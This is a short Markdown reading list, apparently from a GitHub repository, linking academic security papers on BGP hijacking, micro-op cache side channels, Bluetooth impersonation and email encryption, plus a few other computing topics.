- [China’s Maxim](https://scholarcommons.usf.edu/cgi/viewcontent.cgi?article=1050&context=mca): Leave No Access Point Unexploited: The Hidden Story of China Telecom’s BGP Hijacking
- [Listen to Your Key: Towards Acoustics-based Physical Key Inference](https://www.comp.nus.edu.sg/~junhan/papers/SpiKey_HotMobile20_CamReady.pdf)
- [Mailto: Me Your Secrets. On Bugs and Features in Email End-to-End Encryption](https://www.nds.ruhr-uni-bochum.de/media/nds/veroeffentlichungen/2020/08/15/mailto-paper.pdf)
- [Everything Old is New Again: Binary Security of WebAssembly](https://www.usenix.org/conference/usenixsecurity20/presentation/lehmann)
- [Discovering Suspicious APT Behaviors by Analyzing DNS Activities](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC7038486/)
- [Harvard Belfer National Cyber Power Index 2020](https://dataverse.harvard.edu/dataset.xhtml?persistentId=doi:10.7910/DVN/LT55JY)
- [Quantum Blockchain using entanglement in time](https://arxiv.org/pdf/1804.05979.pdf)
- [Reflections on Trusting Trust](https://www.win.tue.nl/~aeb/linux/hh/thompson/trust.html)
- [I See Dead µops: Leaking Secrets via Intel/AMD Micro-Op Caches](http://www.cs.virginia.edu/venkat/papers/isca2021a.pdf)
- [BIAS: Bluetooth Impersonation AttackS](https://francozappa.github.io/about-bias/publication/antonioli-20-bias/antonioli-20-bias.pdf)
- [LOKI: Hardening Code Obfuscation Against Automated Attacks](https://arxiv.org/pdf/2106.08913.pdf)
- [FPGA-Based Near-Memory Acceleration of Modern Data-Intensive Applications](https://www.computer.org/csdl/magazine/mi/5555/01/09451578/1ujXMrdyEuY) [arxiv](https://arxiv.org/abs/2106.06433)

---

## Other Repos

- [mubix](https://github.com/mubix/repos).